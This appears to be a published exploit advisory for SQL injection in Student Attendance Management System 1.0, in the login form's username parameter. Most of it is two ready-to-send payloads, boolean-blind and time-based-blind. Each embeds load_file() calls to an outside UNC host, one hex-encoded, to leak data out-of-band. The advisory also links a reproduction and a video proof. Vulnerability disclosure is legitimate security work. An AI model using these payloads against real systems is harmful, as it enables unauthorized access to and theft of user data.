Student Attendance Management System 1.0 SQL Injection

## Title: Student-Attendance-Management-System 1.0 from Erick O. Omundi Multiple-SQLi## Author: nu11secur1ty## Date: 12.25.2022## Vendor: https://github.com/rickxy## Software: https://github.com/rickxy/Student-Attendance-Management-System## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Student-Attendance-Management-System## Description:The `username` parameter appears to be vulnerable to Multiple-SQLinjection attacks.The attacker can retrieve all sensitive information about the users ofthis system and more bad things.## STATUS: CRITICAL Vulnerability[+] Payload:```MySQL---Parameter: username (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: userType=Administrator&username=lBPxXeUT'+(selectload_file('\\\\eq8r4p3b9u6gn42v38f6ca4cf3lw9oxf03sqje8.erick_from_America.com\\khw'))+''RLIKE (SELECT (CASE WHEN (6217=6217) THEN 0x6c42507858655554+(selectload_file(0x5c5c5c5c6571387234703362397536676e343276333866366361346366336c77396f7866303373716a65382e657269636b5f66726f6d5f416d65726963612e636f6d5c5c6b6877))+''ELSE 0x28 END)) AND 'FUJm'='FUJm&password=q2H!z4n!F1&login=Login    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: userType=Administrator&username=lBPxXeUT'+(selectload_file('\\\\eq8r4p3b9u6gn42v38f6ca4cf3lw9oxf03sqje8.erick_from_America.com\\khw'))+''AND (SELECT 8687 FROM (SELECT(SLEEP(7)))btHE) AND'XFcq'='XFcq&password=q2H!z4n!F1&login=Login---```## Reproduce:[href]()https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Student-Attendance-Management-System## Proof and Exploit:[href](https://streamable.com/goy6ka)## Time spent`00:30:00`